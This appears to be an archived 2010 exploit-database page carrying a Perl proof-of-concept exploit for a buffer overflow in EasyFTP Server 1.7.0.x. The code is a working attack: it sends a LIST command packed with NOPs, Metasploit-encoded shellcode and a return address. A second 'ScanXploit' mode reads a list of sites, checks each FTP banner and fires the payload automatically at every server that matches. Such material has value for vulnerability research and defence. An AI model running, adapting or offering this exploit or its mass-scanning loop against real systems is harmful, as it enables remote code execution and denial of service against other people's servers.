Home / os / win7

[dos / poc] - EasyFTP version 1.7.0.11 and version 1.7.0.2 C

Posted on 18 October 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>EasyFTP version 1.7.0.11 and version 1.7.0.2 Crash PoC | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='EasyFTP version 1.7.0.11 and version 1.7.0.2 Crash PoC by Inj3cti0n P4ck3t in dos / poc | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>====================================================== EasyFTP version 1.7.0.11 and version 1.7.0.2 Crash PoC ====================================================== sub banner { print q { ########################################################################################################## # # # [*] PoC EasyFTP 1.7.0.X Crash # # # # [*] Author: Inj3cti0n P4ck3t # # # # [*] e-mail: fer_henrick@hotmail.com # # # # [*] Date: 18/10/2010 # # # # [*] Greetz: C00l3r - fvox - _MLK_ - DD3str0y3r - s4r4d0 - Sh0rtKiller # # HADES - CODERED - FORAST - Colt7r - Z4i0n - M0nt3r # # Th1nk3r - Hackinho - r0t3d - elemento_pcx - Observing # # Believe - dr4k3 - Bl4ck9_f0x6 # # # # [*] Version Vulnerable: # # # # - EasyFTP Server 1.7.0.11 EN # # # # - EasyFTP Server 1.7.0.2 EN # # # # # # # # [*] System Operacional Tested: # # # # - Windows XP PACK 3 Brazilian # # # # # # # # # # - EasyFTP Server 1.7.0.2 =&gt; http://easyftpsvr.googlecode.com/files/easyftpsvr-1.7.0.2.zip # # # # - EasyFTP Server 1.7.0.11 =&gt; http://easyftpsvr.googlecode.com/files/easyftp-server-1.7.0.11-en.zip # # # # # ###############################Code Exploit ############################################################## } } #!usr/bin/perl use strict; use IO::Socket; use IO::Socket::INET; if (!$ARGV[0]) { &amp;banner(); print q { Options: [1] - Test Exploit [2] - Test ScanXploit } } print &quot; [+] Options: &quot;; our $option = &lt;stdin&gt;; chomp ($option); if ($option == 1) { my $portTest =&quot;21&quot;; my $hostTest=&quot;127.0.0.1&quot;; my $usuarioTest =&quot;anonymous&quot;; my $senhaTest = &quot;adminadmin&quot;; # Buffer needed -&gt; 272 bytes # Metasploit Shellcode PoC - Calc.exe [ 228 bytes ] [ shikata_ga_nai - 1 iteration ] [ badchars x00x0ax2fx5c ] my $shellCodeTest = (&quot;xdaxc0xd9x74x24xf4xbbxe6x9axc9x6dx5ax33xc9xb1x33x31x5ax18x83xeaxfcx03x5axf2x78x3cx91x12xf5xbfx6axe2x66x49x8fxd3xb4x2dxdbx41x09x25x89x69xe2x6bx3axfax86xa3x4dx4bx2cx92x60x4cx80x1ax2ex8ex82xe6x2dxc2x64xd6xfdx17x64x1fxe3xd7x34xc8x6fx45xa9x7dx2dx55xc8x51x39xe5xb2xd4xfex91x08xd6x2ex09x06x90xd6x22x40x01xe6xe7x92x7dxa1x8cx61xf5x30x44xb8xf6x02xa8x17xc9xaax25x69x0dx0cxd5x1cx65x6ex68x27xbex0cxb6xa2x23xb6x3dx14x80x46x92xc3x43x44x5fx87x0cx49x5ex44x27x75xebx6bxe8xffxafx4fx2cx5bx74xf1x75x01xdbx0ex65xedx84xaaxedx1cxd1xcdxafx4ax24x5fxcax32x26x5fxd5x14x4ex6ex5exfbx09x6fxb5xbfxe5x25x94x96x6dxe0x4cxabxf0x13xbbxe8x0cx90x4ex91xebx88x3ax94xb0x0exd6xe4xa9xfaxd8x5bxcax2exbbx3ax58xb2x12xd8xd8x51x6bx28&quot;); my $nopsTest = (&quot;x90&quot; x 40); my $retornoTest = (&quot;x10x3Bx88x00&quot;); # MAGIC RET 00883B10 [ CALL EDI ] my $PayloadTest = $nopsTest . $shellCodeTest . $retornoTest; my $AutenticarTest = (&quot;x55x53x45x52x20&quot; . $usuarioTest . &quot; &quot; . &quot;x50x41x53x53x20 &quot; . $senhaTest . &quot; &quot; . &quot;LIST &quot; . $PayloadTest . &quot; &quot; ); my $socketTest = new IO::Socket::INET (PeerAddr =&gt; $hostTest,PeerPort =&gt; $portTest,Proto =&gt; &#039;tcp&#039;,); die &quot; [x] Error: $! &quot; unless $socketTest; print $socketTest $AutenticarTest; close($socketTest); sleep(2); our $soquetes = IO::Socket::INET-&gt;new(&quot;$hostTest:$portTest&quot;); if($soquetes) { print &quot; [-] Server no exploited &quot;; } else { print &quot; [+] Server Exploited &quot;; } } ################################## ScanXploit ############################################################################################# if ($option == 2) { print &quot; [+] Digite o nome da lista de sites, exampl,: lista.txt: &quot;; our $lista = &lt;stdin&gt;; chomp ($lista); open( SITE, &quot;&lt; $lista&quot; ) or die( &quot; [-] Could not open file: $!&quot; ); our @array = &lt;SITE&gt;; our $numero = $#array; for (our $i = 0; $i &lt;= $numero; $i++) { our $Url = &quot;$array[$i]&quot;; if($Url !~ /http:///) { $Url = &quot;http://$Url&quot;; } our $Stop = index($Url,&quot;:&quot;); our $Protocolo = substr($Url,0,$Stop); our $Start = index($Url,&quot;//&quot;) + 2; our $Dominio = substr($Url,$Start); our $Stop = index($Dominio,&quot;/&quot;); our $Dominio = substr($Dominio,0,$Stop); our $Start = rindex($Url,&quot;/&quot;) + 1; our $NomeArq = substr($Url,$Start); our $Compr_Url = length($Url); our $ponto = &quot;$Dominio &quot;; our @portas = &quot;21&quot;; foreach our $porta (@portas) { our $sock = IO::Socket::INET-&gt;new(&quot;$ponto:$porta&quot;); if($sock) { our $remote = IO::Socket::INET -&gt; new (Proto =&gt; &quot;tcp&quot;, PeerAddr =&gt; $ponto, PeerPort =&gt; $porta, Timeout =&gt; &quot;7&quot;); our $line = &lt;$remote&gt;; if ($line =~ &quot;BigFoolCat&quot;) { my $usuario =&quot;anonymous&quot;; my $senha = &quot;adminadmin&quot;; # Buffer needed -&gt; 272 bytes # Metasploit Shellcode PoC - Calc.exe [ 228 bytes ] [ shikata_ga_nai - 1 iteration ] [ badchars x00x0ax2fx5c ] my $shellCode = (&quot;xdaxc0xd9x74x24xf4xbbxe6x9axc9x6dx5ax33xc9xb1x33x31x5ax18x83xeaxfcx03x5axf2x78x3cx91x12xf5xbfx6axe2x66x49x8fxd3xb4x2dxdbx41x09x25x89x69xe2x6bx3axfax86xa3x4dx4bx2cx92x60x4cx80x1ax2ex8ex82xe6x2dxc2x64xd6xfdx17x64x1fxe3xd7x34xc8x6fx45xa9x7dx2dx55xc8x51x39xe5xb2xd4xfex91x08xd6x2ex09x06x90xd6x22x40x01xe6xe7x92x7dxa1x8cx61xf5x30x44xb8xf6x02xa8x17xc9xaax25x69x0dx0cxd5x1cx65x6ex68x27xbex0cxb6xa2x23xb6x3dx14x80x46x92xc3x43x44x5fx87x0cx49x5ex44x27x75xebx6bxe8xffxafx4fx2cx5bx74xf1x75x01xdbx0ex65xedx84xaaxedx1cxd1xcdxafx4ax24x5fxcax32x26x5fxd5x14x4ex6ex5exfbx09x6fxb5xbfxe5x25x94x96x6dxe0x4cxabxf0x13xbbxe8x0cx90x4ex91xebx88x3ax94xb0x0exd6xe4xa9xfaxd8x5bxcax2exbbx3ax58xb2x12xd8xd8x51x6bx28&quot;); my $nops = (&quot;x90&quot; x 40); my $retorno = (&quot;x10x3Bx88x00&quot;); # MAGIC RET 00883B10 [ CALL EDI ] my $Payload = $nops . $shellCode . $retorno; my $Autenticar = (&quot;x55x53x45x52x20&quot; . $usuario . &quot; &quot; . &quot;x50x41x53x53x20 &quot; . $senha . &quot; &quot; . &quot;LIST &quot; . $Payload . &quot; &quot; ); our $socket = new IO::Socket::INET (PeerAddr =&gt; $ponto,PeerPort =&gt; $porta,Proto =&gt; &#039;tcp&#039;,); die &quot;[x] Error: $! &quot; unless $socket; print $socket $Autenticar; close($socket); } sleep(2); our $soquete = IO::Socket::INET-&gt;new(&quot;$ponto:$porta&quot;); if($soquete) { print &quot; [-] Server no exploited &quot;; } else { print &quot; [+] Server Exploited &quot;; } } } } print &quot; [+] Servers tested: $numero &quot;; } if ($option != 1 &amp;&amp; $option != 2 ) { print &quot; [+] Option invalid &quot;; } exit; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-18]</pre></body></html>

 

TOP